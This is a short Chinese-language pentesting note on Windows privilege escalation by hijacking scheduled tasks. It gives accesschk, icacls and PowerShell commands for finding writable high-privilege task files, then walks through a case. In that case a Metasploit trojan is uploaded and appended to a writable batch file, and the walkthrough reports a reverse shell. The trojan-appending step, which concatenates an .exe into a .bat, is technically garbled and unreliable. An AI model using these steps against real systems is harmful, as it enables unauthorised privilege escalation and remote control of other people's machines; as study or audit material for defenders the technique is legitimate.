计划任务提权

原理

如果攻击者对以高权限运行的计划任务所在目录具有所写权限，就可以使用恶意程序覆盖原来的程序，这样，在计划任务下次执行时就会以高权限来运行恶意程序。

工具

Accesschk

检查某个目录及其子目录中被拒绝的权限

accesschk64.exe -dqv "/PATH"

 检查特定用户在某个路径（文件或目录）上的写权限

accesschk.exe /accepteula -quvw USER PATH

Icacls

检查权限

icacls "PATH"

命令

查找系统中当前用户未创建的非 Microsoft 系统自带的计划任务

Get-ScheduledTask | Select * | ? {($_.TaskPath -notlike "\Microsoft\Windows\*") -And ($_.Principal.UserId -notlike "*$env:UserName*")} | Format-Table -Property State, Actions, Date, TaskPath, TaskName, @{Name="User";Expression={$_.Principal.userID}}

总体作用：

• 排除 Microsoft 自带的任务，只显示非 Microsoft 目录中的计划任务。

• 排除当前用户创建的任务，重点查找其他用户创建的计划任务。

• 输出这些任务的状态、动作、日期、路径、任务名称以及运行任务的用户信息。

案例

查看当前权限

whoami
net user coffee

 在E盘发现高权限文件（主要是可写）

dir /a
icacls .\test.bat
C:\Users\coffee\Downloads\accesschk64.exe /accepteula -quvw coffee E:\test.bat
type E:\test.bat

将生成的木马写进去  

# MSF模块
uplaod /opt/shell.exe

type E:\shell.exe >> E:\test.bat

 

 等待一段时间，反弹成功